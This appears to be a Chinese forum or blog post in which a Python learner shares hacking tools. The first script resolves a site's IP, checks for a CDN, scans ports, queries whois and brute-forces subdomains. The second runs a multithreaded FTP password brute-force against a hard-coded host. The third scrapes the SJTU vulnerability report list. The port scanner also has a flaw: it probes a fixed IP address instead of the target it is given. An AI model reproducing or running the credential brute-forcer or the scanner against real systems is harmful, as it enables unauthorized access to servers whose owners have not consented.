最近在学Python,顺便分享一下自己写的小工具

IP反查+子域名挖掘+cdn判断+whois信息查询+端口扫描

子域名字典可以自己添加,记住要进入字典所在目录运行,建议把字典放在python目录下,端口可以自行更改。

直接在cmd命令行运行,输入all 然后加上网址即可

import os
import socket
import subprocess
import sys
import time

import requests
from whois import whois




#域名反查IP
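def ip_check(url):
    """Resolve *url* (a hostname) to an IPv4 address, print it and return it.

    Args:
        url: Hostname to resolve. An IPv4 literal is handed back unchanged
            by ``socket.gethostbyname`` without a DNS lookup.

    Returns:
        The resolved IPv4 address as a dotted-quad string.

    Raises:
        socket.gaierror: When the name cannot be resolved.
    """
    print('正在域名反查IP\n')
    ip = socket.gethostbyname(url)
    print(ip)
    # Also return the address so callers can reuse it instead of resolving
    # the same name a second time.
    return ip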


#识别目标是否存在CDN

#采用nslookup返回ip数目

#利用python去调用执行系统的命令
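def cdn_check(url):
    """Print a rough guess of whether *url* sits behind a CDN and return it.

    Runs ``nslookup`` on the host and treats more than ten dots in its
    output as "many addresses returned", which is the original author's
    CDN indicator. It is a heuristic only, not a reliable classification.

    Args:
        url: Hostname to look up.

    Returns:
        True when the heuristic says a CDN is present, False otherwise
        (also False when ``nslookup`` is missing or times out).
    """
    print('正在判断是否存在cdn\n')
    # Pass the host as a separate argv element instead of concatenating it
    # into a shell string: url comes straight from the command line, and
    # shell metacharacters in it would otherwise run extra commands.
    try:
        completed = subprocess.run(
            ['nslookup', url],
            capture_output=True,
            text=True,
            errors='replace',
            timeout=30,
            check=False,
        )
        output = completed.stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        # os.popen used to yield empty output in these cases; keep that
        # best-effort behaviour rather than abort the whole run.
        output = ''
    # Same heuristic as before: count the dots in the nslookup output.
    has_cdn = output.count('.') > 10
    if has_cdn:
        print('cdn存在')
    else:
        print('no cdn不存在')
    return has_cdn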




#端口扫描
'''
1.原生自写socket协议 tcp、udp扫描
2.调用第三方模块等扫描
3.调用系统工具脚本执行
'''
def nmap_check(url):
    """Print open/close for a fixed set of TCP ports, labelled with the host resolved from *url*.

    NOTE(review): the connect_ex call below targets a hard-coded address,
    not the ``ip`` resolved from *url*; ``ip`` is only used in the printed
    label. NOTE(review): a single socket object is reused for every
    connect_ex call; a socket that has already connected or failed may not
    be reusable on every platform — confirm the results are meaningful.
    """
    print('正在端口扫描\n')
    ip=socket.gethostbyname(url)

    # A set, so the ports are probed in arbitrary order; values are strings.
    ports={'21','22','135','443','8080','53','7001','3306','3389','80','888'}
    server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    for port in ports:
       # connect_ex returns 0 on success, otherwise an errno value.
       result=server.connect_ex(("49.232.21.141",int(port)))
       if result==0:
          print(ip+':'+port+'|open')
       else:
          print(ip+':'+port+'|close')



#whois信息查询
def whois_check(url):
    """Look up the WHOIS record for *url* and print it."""
    banner = '正在whois信息查询\n'
    print(banner)
    # whois() is the lookup function imported at the top of the file.
    print(whois(url))


#子域名查询
#1.利用字典记载爆破进行查询
#2.利用bing或第三方接口进行查询
def zym_check(url):
    """Prepend each line of dict.txt to *url* and print the names that resolve.

    NOTE(review): ``url.replace('www','')`` removes the substring 'www'
    wherever it occurs and keeps the dot that followed it; when *url*
    contains no 'www' the prefix is joined to the host with no separating
    dot — confirm that is intended.
    """
    print('正在挖掘子域名\n')
    urls=url.replace('www','')
    # dict.txt is read relative to the current working directory and the
    # file handle is never closed explicitly.
    for zym_data in open('dict.txt'):
        zym_data=zym_data.replace('\n','')
        url=zym_data+urls
        try:
          ip=socket.gethostbyname(url)
          print(url+'->'+ip)
          # Short pause between lookups.
          time.sleep(0.1)
        except Exception as e:
          # Names that fail to resolve are skipped silently.
          pass

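if __name__ == '__main__':
    # Usage: python <script> all <hostname>
    # Guard the argv reads so a missing argument prints usage instead of
    # raising IndexError.
    if len(sys.argv) < 3:
        print('usage: python ' + sys.argv[0] + ' all <url>')
        sys.exit(1)
    check = sys.argv[1]   # 'all' runs every check in sequence
    url = sys.argv[2]     # target hostname
    if check == 'all':
        ip_check(url)
        cdn_check(url)
        nmap_check(url)
        whois_check(url)
        zym_check(url)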


ftp爆破:

import ftplib
import threading
import queue
import sys

def ftp_check():
    """Worker: take 'user|pass' entries from the global queue ``q`` and try
    each one against the FTP server at the address hard-coded below.

    ``q`` is a module-level ``queue.Queue`` filled in the ``__main__``
    block, so this function only works when the script is run directly.
    Each attempt prints 'success|user|pass' or 'failed|user|pass'.
    """

    while not q.empty(): # q.empty() is True when no entries are left
        dict=q.get()   # one 'user|pass' entry per get() (name shadows the builtin)
        dict=dict.split('|')  # split the entry into [user, pass]
        username=dict[0]
        password=dict[1]
        ftp=ftplib.FTP()    # fresh client for each attempt
        try:
            ftp.connect('169.254.117.98',21)  # NOTE(review): server address and port are hard-coded
            ftp.login(username,password)  # raises on rejected credentials
            ftp.retrlines('list')    # list the current directory
            ftp.close()  # close this side of the connection
            print('success|' + username + '|' + password)
        except ftplib.all_errors:
            print('failed|' + username + '|' + password)
            ftp.close()
            pass


if __name__ == '__main__':

    print("python ftp_burte.py user.txt pass.txt 10")  # usage reminder
    user_file=sys.argv[1]
    pass_file=sys.argv[2]
    thred_x=sys.argv[3]   # number of worker threads (string, converted below)

    q=queue.Queue()   # FIFO queue; ftp_check() reads it as a module global
    # Every user/password pair is enqueued as one 'user|pass' string.
    # Both files are read relative to the current working directory and
    # pass_file is reopened once per username.
    for username in open(user_file):
        for password in open(pass_file):
            username=username.replace('\n','')
            password=password.replace('\n','')
            dictlist=username+'|'+password
            q.put(dictlist)  # enqueue the pair

    for x in range(int(thred_x)):
        t=threading.Thread(target=ftp_check) # one worker thread per iteration
        t.start()

教育漏洞提取

import requests
from lxml import etree
import time
import lxml


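def edu_list(page):
    """Fetch pages 1..*page* of the src.sjtu.edu.cn list and append the
    extracted entries to ``src.txt``.

    Args:
        page: Number of pages to fetch; converted with ``int``.

    Each page is downloaded, parsed with lxml, and every whitespace-separated
    token taken from the ``<td class="">`` links is written as one line to
    ``src.txt`` in the current directory. A page that fails to download or
    parse is reported, followed by a short pause, and the loop moves on.
    """
    for yeshu in range(1, int(page) + 1):
        print('正在打印第'+str(yeshu)+'页')
        try:
            url = 'https://src.sjtu.edu.cn/list/?page=' + str(yeshu)
            # A timeout keeps one stalled connection from hanging the loop.
            data = requests.get(url, timeout=30).content
            soup = etree.HTML(data.decode('utf-8'))
            result = soup.xpath('//td[@class=""]/a/text()')

            # Join with newlines, then split on all whitespace to drop
            # stray blanks and embedded line breaks.
            results = '\n'.join(result)
            resultss = results.split()
            print(resultss)

            # Open the output file once per page instead of once per entry;
            # the with-block closes it, so no explicit close() is needed.
            with open('src.txt', 'a+', encoding='utf-8') as f:
                for edu in resultss:
                    f.write(edu + '\n')

        except Exception as e:
            # Best-effort: report the failure, pause briefly, continue.
            print('page ' + str(yeshu) + ' failed: ' + str(e))
            time.sleep(0.5)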
if __name__ == '__main__':
    # Ask for the number of pages to extract and hand it to edu_list.
    print('请输入提取页数')
    page_count = input('a=')
    edu_list(page_count)

如果你停止 就是低谷 如果你还在继续 就是上坡